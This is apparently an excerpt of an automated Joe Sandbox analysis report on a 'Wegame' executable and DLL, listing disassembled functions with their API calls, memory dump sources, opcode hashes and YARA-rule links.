                                                                • Opcode ID: 70b8130a594460319de6a2506c94a0d230c4bad692bf82c0889d09657f7d78af
                                                                • Instruction ID: 7e6f890d8260491e3fc0d7ab4cd9d84fb82d8275a99a0db7ea9b2d2dc68a7e86
                                                                • Opcode Fuzzy Hash: 70b8130a594460319de6a2506c94a0d230c4bad692bf82c0889d09657f7d78af
                                                                • Instruction Fuzzy Hash: FE0119B19007008BD7349F3A884150AFAF5BF90724B608A5FD0A69BAA0DBB8A600CB55
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD46FE3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD46FEA
                                                                  • Part of subcall function 6BD4A3E3: __EH_prolog3_catch_GS.LIBCMT ref: 6BD4A3ED
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3H_prolog3_catch_
                                                                • String ID: Pvy
                                                                • API String ID: 863784098-3275874378
                                                                • Opcode ID: f9a98154d519aa2af7ced052fa8ebd09f3d3c033ed3fa1d611cc4437cf17400b
                                                                • Instruction ID: 2657a42021d0fccdd770fd5c20cd2f1e836a0e510eab050cecf0de6f05b92bcd
                                                                • Opcode Fuzzy Hash: f9a98154d519aa2af7ced052fa8ebd09f3d3c033ed3fa1d611cc4437cf17400b
                                                                • Instruction Fuzzy Hash: B7E0ED31520209AFDF156FA8C9077EE3B62BF1036AF60425DF4111D1A1C77ACA35ABE2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00450FA9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00450FB0
                                                                  • Part of subcall function 00450F32: __EH_prolog3_GS.LIBCMT ref: 00450F39
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_
                                                                • String ID: vF
                                                                • API String ID: 2427045233-49000009
                                                                • Opcode ID: e0993cdc1a55339e91c04f4e3ae07f0e69bf0676f9064051b39cd4e1b36cd62d
                                                                • Instruction ID: 106f27b580e73408323526147192fc227aa2d0378545842578f3488132498658
                                                                • Opcode Fuzzy Hash: e0993cdc1a55339e91c04f4e3ae07f0e69bf0676f9064051b39cd4e1b36cd62d
                                                                • Instruction Fuzzy Hash: DAE04672A1020897CB24E6B6C426ADDBA609B20368F00812EF000A71D2EF7C9E0587AC
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD04E10 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 206COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.VCRUNTIME140(?,00000000,?), ref: 6BD0509A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset
                                                                • String ID: 8
                                                                • API String ID: 2221118986-4194326291
                                                                • Opcode ID: 64a2beafb2644f1757d99032139ed5422b24e7856ca93a26028574c29d38b0cc
                                                                • Instruction ID: 1b036b9586328114ec739968ba95ed93d17dfc1d14743118cb855d3425a14f9d
                                                                • Opcode Fuzzy Hash: 64a2beafb2644f1757d99032139ed5422b24e7856ca93a26028574c29d38b0cc
                                                                • Instruction Fuzzy Hash: 2D9106B1600A02EBD714CF29D894792F7F1FF48328F14422AD5698BA90DB7AE464DFC1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BE161D0 Relevance: 3.2, APIs: 2, Instructions: 162COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BE1623F
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?), ref: 6BE162BF
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                • String ID:
                                                                • API String ID: 3668304517-0
                                                                • Opcode ID: 7c84c45e29b55ee5ff9d75568a4a411b6f1fd9a88502ed19921a5d6f2fc6a488
                                                                • Instruction ID: 5764102b2f250be67a3fb79ea35141b63999d4875da2d666b7019f35843529f9
                                                                • Opcode Fuzzy Hash: 7c84c45e29b55ee5ff9d75568a4a411b6f1fd9a88502ed19921a5d6f2fc6a488
                                                                • Instruction Fuzzy Hash: AD4104726041045FD718CF18D894BAABBFAEFC1354F34851DE84A8B390DB75E959C790
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD25515 Relevance: 3.1, APIs: 2, Instructions: 106COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD2551C
                                                                • ?get_workingdir_path@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,00000058), ref: 6BD25540
                                                                  • Part of subcall function 6BD2755B: __EH_prolog3_GS.LIBCMT ref: 6BD27562
                                                                  • Part of subcall function 6BD2755B: ?current_path@filesystem@ierd_tgp@@YA?AVpath@12@AAVerror_code@std@@@Z.COMMON(?,?,?,?,0000002C,6BD25545,?,00000058), ref: 6BD2759D
                                                                  • Part of subcall function 6BD2755B: ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(00000000,?,?,?,?,?,0000002C,6BD25545,?,00000058), ref: 6BD275A7
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@H_prolog3_U?$char_traits@V?$allocator@V?$basic_string@$?current_path@filesystem@ierd_tgp@@?get_workingdir_path@?u16to8@common@ierd_tgp@@Application@common@ierd_tgp@@D@2@@4@@D@2@@std@@U?$char_traits@_V?$allocator@_V?$basic_string@_Verror_code@std@@@Vpath@12@W@2@@std@@W@std@@
                                                                • String ID:
                                                                • API String ID: 452369562-0
                                                                • Opcode ID: 2a4dd022787be578f27274e7fc0f81e3be5718905c9f71d4d8f8e174e2444427
                                                                • Instruction ID: bc9279691e42a03d8adb6f0c8e672f3051bd9e1c3a8377ab42ec77df1f97914a
                                                                • Opcode Fuzzy Hash: 2a4dd022787be578f27274e7fc0f81e3be5718905c9f71d4d8f8e174e2444427
                                                                • Instruction Fuzzy Hash: 6C415BB1801248EFCF04CFE4C981ADEBBB8BF14328F10425AE515AF295DB789B05CB60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0045684F Relevance: 3.1, APIs: 2, Instructions: 103COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 00456856
                                                                  • Part of subcall function 00453291: __EH_prolog3.LIBCMT ref: 00453298
                                                                  • Part of subcall function 004567DF: __EH_prolog3.LIBCMT ref: 004567E6
                                                                  • Part of subcall function 004567DF: _CxxThrowException.VCRUNTIME140(?,0049C1AC,?,00000054,004568B0,00000000,?,?,00000030,00453EC0,00000000,int __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_s,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,000002A0), ref: 00456811
                                                                • __EH_prolog3.LIBCMT ref: 004568B8
                                                                  • Part of subcall function 004532C0: __EH_prolog3.LIBCMT ref: 004532C7
                                                                  • Part of subcall function 00456817: __EH_prolog3.LIBCMT ref: 0045681E
                                                                  • Part of subcall function 00456817: _CxxThrowException.VCRUNTIME140(?,0049C288,?,00000054,?,0049C1AC,?,00000054,004568B0,00000000,?,?,00000030,00453EC0,00000000,int __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_s), ref: 00456849
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$ExceptionThrow
                                                                • String ID:
                                                                • API String ID: 2323905274-0
                                                                • Opcode ID: 82afe54a5b79e7a2911202749aca1eba2d75e57b651cdab68fcad4d550eb75a9
                                                                • Instruction ID: fd55ab33862aed6cc14af8e3b93c8d988df48b502f6cbe1ba34403de8e7cb969
                                                                • Opcode Fuzzy Hash: 82afe54a5b79e7a2911202749aca1eba2d75e57b651cdab68fcad4d550eb75a9
                                                                • Instruction Fuzzy Hash: 9D316671D0021AABCF11AFB2CC869AF7769EF04359F51441ABD14B7253EE38D91887A8
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD38127 Relevance: 3.1, APIs: 2, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD38131
                                                                  • Part of subcall function 6BD382B3: __EH_prolog3_GS.LIBCMT ref: 6BD382BA
                                                                • memset.VCRUNTIME140(?,00000000,00000040,000000A0,6BD3A0D1,?,?,?), ref: 6BD38192
                                                                  • Part of subcall function 6BD0A8F0: memmove.VCRUNTIME140(?,?,6BD15839,?,?,00000000,?,?,6BD15839,?,?), ref: 6BD0A917
                                                                  • Part of subcall function 6BD0A8F0: memmove.VCRUNTIME140(00000000,?,6BD15839,?,?,00000000,?,?,6BD15839,?,?), ref: 6BD0A9BB
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_memmove$memset
                                                                • String ID:
                                                                • API String ID: 2853179963-0
                                                                • Opcode ID: 1350adcd92b9290733d70f35eaa44cb162f438e7bbc2a2917d903535449cc37f
                                                                • Instruction ID: c7e41781adb92d0d517d7b76b411fcf73cbcc15e58e110e42815fe8ec17c34db
                                                                • Opcode Fuzzy Hash: 1350adcd92b9290733d70f35eaa44cb162f438e7bbc2a2917d903535449cc37f
                                                                • Instruction Fuzzy Hash: 7821B476E00329AFDF24DBB0DC81FDEB3B8AB06314F4044AAE508EB151DB39A6448B51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD2E69D Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD2E6A7
                                                                  • Part of subcall function 6BD2E537: __EH_prolog3.LIBCMT ref: 6BD2E53E
                                                                  • Part of subcall function 6BD1820A: __EH_prolog3.LIBCMT ref: 6BD18211
                                                                  • Part of subcall function 6BD1820A: ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,00000018,6BD2EA59,00000000,?,000000C4,6BD2A828,00000000,00000008,00000009,00000003,00000024,6BDBA75E,create_directory_ex fail, error code:%1%, path:%2%), ref: 6BD1821C
                                                                  • Part of subcall function 6BD1820A: ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,00000094), ref: 6BD18233
                                                                  • Part of subcall function 6BD1820A: std::locale::_Getfacet.LIBCPMT ref: 6BD1823D
                                                                  • Part of subcall function 6BD1820A: ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,00000008,00000000), ref: 6BD18256
                                                                  • Part of subcall function 6BD1820A: std::_Facet_Register.LIBCPMT ref: 6BD1826E
                                                                  • Part of subcall function 6BD1820A: ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000094), ref: 6BD18291
                                                                • ?widen@?$ctype@D@std@@QBEDD@Z.MSVCP140(00000020,?,00000088,6BD2EAB6,00000000), ref: 6BD2E6CA
                                                                  • Part of subcall function 6BD2B63B: __EH_prolog3.LIBCMT ref: 6BD2B642
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$D@std@@Lockit@std@@$??0_??1_?widen@?$ctype@Bid@locale@std@@Facet_Getcat@?$ctype@GetfacetH_prolog3_RegisterV42@@Vfacet@locale@2@std::_std::locale::_
                                                                • String ID:
                                                                • API String ID: 194000845-0
                                                                • Opcode ID: 425f58ab46e19ff3c5acd1b5cb77ef7fc4debdbb64d1cd87bc6871c2cf63f18e
                                                                • Instruction ID: 9e980474454f0f135740d7e99646487b9e9a8447dde9d52d14ee3966665828d6
                                                                • Opcode Fuzzy Hash: 425f58ab46e19ff3c5acd1b5cb77ef7fc4debdbb64d1cd87bc6871c2cf63f18e
                                                                • Instruction Fuzzy Hash: 01219C71900248DBDB24EB70CD96B9DBB75AF1036CF508198D25A9B1D0DF389F4ADB20
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BDB5AF0 Relevance: 3.1, APIs: 2, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BDB5AF7
                                                                  • Part of subcall function 6BD0A8F0: memmove.VCRUNTIME140(?,?,6BD15839,?,?,00000000,?,?,6BD15839,?,?), ref: 6BD0A917
                                                                • ?ReadPrivateProfile@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@00AAV45@1@Z.COMMON(?,?,?), ref: 6BDB5B58
                                                                  • Part of subcall function 6BDB585A: __EH_prolog3_GS.LIBCMT ref: 6BDB5864
                                                                  • Part of subcall function 6BDB585A: ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,000002DC), ref: 6BDB591E
                                                                  • Part of subcall function 6BDB585A: ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?,000002DC), ref: 6BDB5930
                                                                  • Part of subcall function 6BDB585A: ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?,?,?,000002DC), ref: 6BDB593D
                                                                  • Part of subcall function 6BDB585A: ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?,?,?,?,?,000002DC), ref: 6BDB594F
                                                                  • Part of subcall function 6BDB585A: memset.VCRUNTIME140(?,00000000,00000208,?,?,?,?,?,?,?,?,000002DC), ref: 6BDB5962
                                                                  • Part of subcall function 6BDB585A: GetPrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6BDB59CA
                                                                  • Part of subcall function 6BDB585A: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 6BDB59D4
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$?u8to16@common@ierd_tgp@@D@2@@std@@U?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@4@@W@std@@$H_prolog3_Private$?get_log_instance@base@@D@2@@std@@00Logger@1@ProfileProfile@ReadStringSys_wrapper@common@ierd_tgp@@V45@1@memmovememset
                                                                • String ID:
                                                                • API String ID: 1882573419-0
                                                                • Opcode ID: 9877a68aa891bc4da79ce766c5d6600173945e5eccaf0a0050ffd7b28f634fcd
                                                                • Instruction ID: 5960d1c10ff96b86210b5c1dc26ab5d8fc2f513f78bcc36f616f582a9ad108de
                                                                • Opcode Fuzzy Hash: 9877a68aa891bc4da79ce766c5d6600173945e5eccaf0a0050ffd7b28f634fcd
                                                                • Instruction Fuzzy Hash: D72119B1C04349DFCB14CFB8C8816EEBFB4AF19324F14416AD555AB281E7385A46CB60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD31D7B Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CountH_prolog3_Tick
                                                                • String ID:
                                                                • API String ID: 2349883465-0
                                                                • Opcode ID: ff3f8377b54597f99c260caa9a66178339edaea93a860e03b1eb3dde390a510c
                                                                • Instruction ID: 0575c8eae24c714bc311d02e09cda67f5442f49ab7f3c337a3ef283fcf01414c
                                                                • Opcode Fuzzy Hash: ff3f8377b54597f99c260caa9a66178339edaea93a860e03b1eb3dde390a510c
                                                                • Instruction Fuzzy Hash: BE219C309052A8EBDB16DBB4C455BDD7BB0AF13328F044089D4829F292DBBD9B49D762
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD9B8BA Relevance: 3.1, APIs: 2, Instructions: 60sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Sleep.KERNEL32(00000064), ref: 6BD9B948
                                                                • select.WS2_32(00000100,?,?,?,?), ref: 6BD9B970
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
